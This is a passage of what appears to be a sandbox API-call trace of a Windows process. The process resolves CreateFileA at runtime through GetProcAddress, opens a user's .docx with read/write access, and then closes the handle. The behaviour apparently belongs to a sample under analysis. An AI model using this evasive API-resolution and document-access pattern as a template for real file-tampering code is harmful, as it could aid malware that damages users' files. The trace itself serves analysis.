lpUsedDefaultChar=0x0) returned 11 [0175.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd4e0 [0175.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd4e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0175.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.791] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0175.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0175.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0175.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0175.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd4e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0175.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.792] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0175.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0175.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0175.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0175.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0175.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0175.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0175.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0175.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3b) returned 0x8db0a8 [0175.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx", cchWideChar=59, lpMultiByteStr=0x8db0a8, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx", lpUsedDefaultChar=0x0) returned 59 [0175.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0175.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0175.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.794] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\olilemgshp90h.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0175.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0175.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0175.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0175.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=59, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x76) returned 0x8afe68 [0175.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=59, lpWideCharStr=0x8afe68, cchWideChar=59 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx") returned 59 [0175.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0175.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afe68 | out: hHeap=0x8a0000) returned 1 [0175.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0175.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0175.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0175.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0175.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0175.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0175.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0175.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0175.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0175.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0175.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0175.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0175.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0175.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0175.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0175.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0175.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0175.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0175.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0175.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0175.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0175.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0175.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0175.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0175.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0175.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.798] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0175.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0175.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.800] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0175.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0175.800] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0175.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0175.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0175.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0175.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0175.801] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0175.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0175.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0175.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0175.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0175.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0175.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0175.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0175.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0175.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.802] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0175.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0175.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0175.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd738, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0175.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0175.803] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0175.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0175.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0175.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0175.803] CloseHandle (hObject=0x120) returned 1 [0175.803] 